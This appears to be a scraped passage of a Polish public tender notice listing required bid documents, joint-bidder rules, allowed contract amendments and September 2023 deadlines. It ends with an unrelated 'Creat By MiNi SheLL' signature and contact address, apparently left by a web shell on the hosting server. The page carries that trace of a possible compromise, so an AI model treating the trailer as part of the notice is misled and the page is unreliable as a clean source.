Zamawiający żąda, by Wykonawca który składa ofertę, złożył wraz z ofertą następujące przedmiotowe środki dowodowe<br/>na potwierdzenie zgodności oferowanego przedmiotu zamówienia z wymaganiami dotyczącymi wymagań i parametrów<br/>technicznych w zakresie, wszystkich funkcjonalności oferowanego urządzenia oraz w zakresie parametrów technicznych,<br/>określonych w opisie przedmiotu zamówienia wg Załącznika nr 1 do SWZ:<br/>a) projekt, wizualizację graficzną ukazującą scenę przed i po rozłożeniu.<br/>2. Zamawiający akceptuje równoważne przedmiotowe środki dowodowe, jeśli potwierdzają, że oferowany asortyment<br/>spełnia określone przez Zamawiającego wymagania, cechy lub kryteria.<br/>3. Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> projekt, wizualizację graficzną ukazującą scenę przed i po rozłożeniu. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Do oferty należy dołączyć następujące dokumenty:<br/>1.1. wypełniony i podpisany Formularz opis przedmiotu zamówienia zgodnie z Załącznikiem nr 1 do SWZ,<br/>1.2. wypełniony i podpisany Formularz oferty sporządzony zgodnie z Załącznikiem nr 2 do SWZ,<br/>1.3. przedmiotowe środki dowodowe o których mowa w Rozdziale X SWZ,<br/>1.4. wypełnione i podpisane oświadczenie o braku podstaw do wykluczenia sporządzone zgodnie z Załącznikiem nr 3 do<br/>SWZ (UWAGA! Oświadczenie składa Wykonawca, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia oraz<br/>podmiot udostępniający zasoby),<br/>1.5. wypełnione i podpisane oświadczenie o spełnieniu warunków udziału w postępowaniu sporządzone zgodnie z Załącznikiem nr 4 do SWZ (UWAGA! Oświadczenie składa Wykonawca, Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia oraz podmiot udostępniający zasoby),<br/>1.6. wypełnione i podpisane zobowiązanie podmiotu o oddaniu Wykonawcy swoich zasobów sporządzone zgodnie z<br/>Załącznikiem nr 7 do SWZ jeśli Wykonawca będzie polegał na zdolnościach technicznych lub zawodowych podmiotów<br/>udostępniających zasoby,<br/>1.7. w przypadku podpisywania oferty lub poświadczania za zgodność z oryginałem kopii dokumentów przez osobę<br/>niewymienioną w dokumencie rejestrowym (ewidencyjnym) Wykonawcy, który składa ofertę za pośrednictwem<br/>pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie do<br/>złożenia oferty lub do złożenia oferty i podpisania umowy,<br/>1.8. w przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia Wykonawcy są zobowiązani do<br/>ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania<br/>w postępowaniu o udzielenie zamówienia tych Wykonawców, należy załączyć do oferty.<br/>2. Pełnomocnictwo osób podpisujących ofertę do reprezentowania Wykonawcy, zaciągania w jego imieniu zobowiązań<br/>finansowych w wysokości odpowiadającej cenie oferty oraz podpisania oferty musi bezpośrednio wynikać z dokumentów<br/>dołączonych do oferty. Oznacza to, że jeżeli pełnomocnictwo takie nie wynika wprost z dokumentu stwierdzającego status<br/>prawny Wykonawcy (odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej lub<br/>umowa spółki cywilnej w przypadku spółek cywilnych), to do oferty należy dołączyć pełnomocnictwo w formie oryginału<br/>dokumentu elektronicznego, podpisanego kwalifikowanym podpisem elektronicznym lub elektroniczne poświadczenie<br/>zgodności kopii z okazanym dokumentem, dokonane przez notariusza, który opatruje ten dokument bezpiecznym podpisem<br/>elektronicznym weryfikowanym przy pomocy kwalifikowanego certyfikatu. Elektronicznego poświadczenia przez notariusza<br/>nie opatruje się pieczęcią notariusza (art. 97 § 2 Ustawy prawo o notariacie t.j. Dz. U. z 2022 r. poz. 1799, z 2023 r. poz.<br/>1394, 1615). Pełnomocnictwo musi być wystawione przez osoby upełnomocnione do reprezentowania Wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o zamówienie są zobowiązani do ustanowienia pełnomocnika do reprezentowania<br/>ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego<br/>zamówienia publicznego.<br/>2. Oryginał pełnomocnictwa opatrzony elektronicznym kwalifikowanym podpisem lub elektronicznym podpisem zaufanym<br/>lub elektronicznym podpisem osobistym przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia lub kopia<br/>potwierdzona notarialnie, opatrzona kwalifikowanym podpisem elektronicznym przez notariusza, powinny być załączone do<br/>oferty i zawierać w szczególności wskazanie:<br/>2.1. postępowania o zamówienie publiczne, którego dotyczą,<br/>2.2. wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem<br/>adresu siedziby,<br/>2.3. ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>3. Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>4. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o braku podstaw do wykluczenia<br/>(Załącznik nr 3 do SWZ) oraz oświadczenie o spełnieniu warunków udziału w postępowaniu (Załącznik nr 4 do SWZ) składa<br/>każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw do wykluczenia oraz spełnienie warunków udziału w<br/>postępowaniu.<br/>5. Składając ofertę wspólną należy złożyć d <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Na podstawie art. 455 Ustawy Pzp, Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w<br/>stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy.<br/>2. Poza zmianami umowy dopuszczonymi w art. 455 Ustawy Pzp. dopuszcza się możliwość zmian postanowień zawartej<br/>umowy, w następujących przypadkach:<br/>2.1. zmiany wynagrodzenia Wykonawcy – jeśli na podstawie odrębnych przepisów nastąpią zmiany stawek podatku: w takiej<br/>sytuacji stosuje się stawkę podatku VAT aktualną na dzień wystawienia faktury VAT. 2.2. aktualizacji danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy, zmianę adresu siedziby, zmianę formy<br/>prawnej itp.,<br/>2.3. zmiany terminów realizacji przedmiotu zamówienia z przyczyn niezależnych od Wykonawcy lub Zamawiającego, w<br/>szczególności w przypadku okoliczności wystąpienia siły wyższej (tj. zdarzenia zewnętrznego, niemożliwego lub prawie<br/>niemożliwego do przewidzenia, którego skutkom nie można zapobiec np. wprowadzenie kolejnych zakazów w związku z<br/>obowiązującym stanem epidemii lub stanem zagrożenia epidemiologicznego jak również negatywny wpływ konfliktu<br/>zbrojnego, uniemożliwiającym/wstrzymującym realizację przedmiotu zamówienia, nieobowiązujących w dacie zawarcia<br/>umowy, strajki generalne, działania zbrojne, wywłaszczenia, etc.), mającego bezpośredni wpływ na termin wykonania<br/>przedmiotu zamówienia lub z powodu działania osób trzecich, które to przyczyny każda ze Stron musi udokumentować,<br/>2.4. zmiany dotyczącej dostarczanych elementów przedmiotu zamówienia w sytuacji, gdy nastąpi wycofanie danego modelu<br/>(typu, wersji) z produkcji przez producenta albo jeśli dostarczany asortyment nie jest dostępny na rynku, a dostępny będzie<br/>sprzęt, akcesoria lub oprogramowanie o parametrach nie gorszych niż wynikające z SWZ, umowy i oferty Wykonawcy, pod<br/>warunkiem, że nowa cena nie będzie wyższa niż wskazana w ofercie (tzn. elementy zamienne mogą mieć cenę niższą albo<br/>równą cenie ofertowej), fakt ten Wykonawca musi pisemnie udokumentować,<br/>2.5. zmniejszenia zakresu i ilości dostarczanych elementów przedmiotu zamówienia oraz związane z tym zmniejszenie<br/>wartości umowy, wynikające z przyczyn niezależnych od Zamawiającego lub Wykonawcy, które to przyczyny każda ze<br/>Stron musi udokumentować,<br/>2.6. zmiany dotyczącej dostarczanych elementów przedmiotu zamówienia albo terminu realizacji przedmiotu zamówienia w<br/>sytuacji, gdy powstała możliwość zastosowania nowszych i korzystniejszych dla Zamawiającego rozwiązań<br/>technologicznych, technicznych lub w dziedzinie oprogramowania, niż te istniejące w chwili zawarcia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-29 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-28</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com